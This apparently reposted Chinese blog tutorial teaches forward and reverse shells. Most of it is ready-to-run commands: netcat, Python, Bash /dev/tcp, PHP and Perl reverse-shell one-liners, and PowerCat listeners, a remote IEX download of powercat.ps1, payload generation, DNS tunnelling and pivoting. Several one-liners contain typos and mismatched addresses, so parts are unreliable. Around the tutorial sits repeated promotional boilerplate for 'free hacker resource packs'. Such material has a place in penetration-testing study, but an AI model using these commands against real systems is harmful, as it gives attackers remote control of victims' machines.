先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
(1)正向 Shell
输人如下命令,监听目标主机的 4444 端口,如图 3-38 所示
nc -lvp 4444 -e /bin/sh //Linux``nc -lvp 4444 -e c:\windows\system32\cmd.exe //Windows
输入如下命令,在本地或者 VPS 主机上连接目标主机的 4444端口。查看当前的IP 地址,已经是 192.168.1.11 了
nc 192.168.1.11 4444
现在可以在目标主机上看到 192.168.1.4 正在连接本机
(2)反向 Shell
输入如下命令,在本地或者 VPS 主机上监听本地 9999 端口
nc-lvp 9999在目标主机中输入如下命令,连接 VPS 主机192.168.1.4 的9999端口。
nc 192.168.11.144 9999 -e /bin/sh //Linux``nc 192.168.11.144 9999 -e c:\windows\system32\cmd.exe //Windows
现在就可以在本地或者 VPS 主机上看到连接了。查看当前的IP 地址,已经是 1.1.1.200了
4、在目标主机中没有 nc 时获取反向 Shell
在一般情况下,目标主机中是没有 nc 的。此时,可以使用其他工具和编程语言来代替 nc,实现反向连接。下面介绍几种常见的反向 Shell。
(1)Python 反向 Shell
执行如下命令,在 VPS 上监听本地 2222 端口
nc -lvp 2222
在目标主机上执行如下命令
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect (("192.168.1.4",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os,dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
查看当前的IP 地址,已经是 11.1.116 了,说明连接已经建立
(2)Bash 反向 Shell
执行如下命令,在 VPS 上监听本地 4444 端口
nc -lvp 4444
在目标主机上执行如下命令
bash -i >& /dev/tcp/192.168.1.4/4444 0>&1
查看当前的 IP 地址,已经是 1.1.1.116 了,说明连接已经建立
(3)PHP 反向 Shell
同样,首先执行如下命令,在 VPS 上监听本地 2222 端口。
nc -lvp 2222
PHP 常用在 Web 服务器上,它是 nc、Perl 和 Bash 的一个很好的替代品。执行如下命令,实现 PHP 环境下的反弹 Shell。
php -r '$sock=fsockopen("192.168.1.4",2222);exec ("/bin/sh -i <&3 >&3 2>&3");'
现在,已经在 VPS 上建立连接了。查看当前的IP 地址,已经是 1.1.1.116 了
(4)Perl 反向 Shell
执行如下命令,在 VPS 上监听本地 4444 端口。
`nc -lvp 4444`
如果此时目标主机使用的是 Perl 语言,仍然可以使用 Perl 来建立反向 Shell。
在目标主机上运行如下命令,会发现 VPS 已经与目标主机建立了连接。查看当前的IP 地址已经是1.1.1.116 了
perl -e 'use Socket;$i="192.168.1.4";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))(open(STDIN,">$S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PowerCat
PowerCat 可以说是 nc 的 PowerShell 版本。PowerCat 可以通过执行命令回到本地运行,也可以使用远程权限运行
(1)通过nc正向连接 PowerCat
在Windows 7服务器上执行监听命令“powercat -l-p 8080-e cmd.exe -v”,然后在 Kali Linux主机上执行“netcat 192.168.56.130 8080-vv”命令
-l:监听模式,用于入站连接
-P:指定监听端口
-c:指定要启动进程的名称
-v:显示详情
(2)通过nc 反向连接 PowerCat
在Kali Linux 中执行如下命令
netcat -l -p 8888 -vv
在 Windows7 中执行如下命令,-c 参数用于提供想要连接的IP 地址。
powercat -c 192.168.56.129 -p 8888 -v -e cmd.exe
(3)通过 PowerCat 返回 PowerShell:
如果你想要在Windows 7与Windows Server 2008之间建立正向连接并返回PowerShell,可以按照以下步骤进行。在Windows Server 2008 R2中执行如下命令:
IEX (New-Object Net.Webclient).Downloadstring('http://10.10.10.1/powercat.ps1')
在Windows 7中执行如下命令,其中-ep参数用于返回PowerShell:
powercat -c 10.10.10.129 -p 9999 -v -ep
(4)通过 PowerCat 传输文件:
在Windows 7中创建一个名为test.txt的文件,放在C盘根目录下。然后在Windows Server 2008中执行以下命令:
powercat -l -p 9999 -of test.txt -v
返回到Windows 7,执行以下命令将test.txt传输到服务器:
powercat -c 10.10.10.129 -p 9999 -i c:\test.txt -v
即使文件传输完成,连接也不会自动断开。你可以在Windows 7中通过在文件末尾追加内容,或按下“Ctrl+C”键断开连接。
-i: 输入,可以是文件名或字符串,例如 “am test” | powercat -c…
-of: 输出文件名,可以附加路径。
(5)用 PowerCat 生成 Payload:
PowerCat生成的Payload可以是正向或反向的,还可以进行编码。尝试生成一个简单的Payload,在Windows 7中执行以下命令:
powercat -l -p 8000 -e cmd -v -g >> shell.ps1
将生成的ps1文件上传到Windows Server 2008并执行,然后在Windows 7中执行以下命令获取一个反弹Shell:
powercat -c 10.10.10.129 -p 8000 -v
如果要反弹PowerShell,可以执行以下命令:
powercat -l -p 8000 -ep -y -g >> shell.ps1
(6) PowerCat DNS 隧道通信:
PowerCat还支持基于DNS通信的隧道。PowerCat的DNS通信基于dnscat设计(其服务端是dnscat)。
(7)将 PowerCat 作为跳板:
在测试环境中,有三台主机,其中Windows 7主机可以通过ping访问Windows Server 2008主机和Kali主机,而Kali主机和Windows Server 2008主机之间无法通过网络连接。为了实现Windows 7主机作为跳板,连接Kali Linux主机和Windows Server 2008主机,执行以下步骤:
在Windows Server 2008中执行:
powercat -l -v -p 9999 -e cmd.exe
在Windows 7中执行:
powercat -l -v -p 8000 -r tcp:10.10.10.129:9999
最后,连接Kali Linux主机,Windows 7主机将流量传递给Windows Server 2008主机。你还可以使用DNS协议,在Windows 7中执行:
powercat -l -p 8000 -r dns:192.168.56.129::ttpowercat.test
在Kali Linux中执行dnscat启动命令。在Windows Server 2008中执行:
powercat -c -p 8000 -v -e cmd.exe
参考文献:《内网安全攻防渗透测试实战攻防》
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
png)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!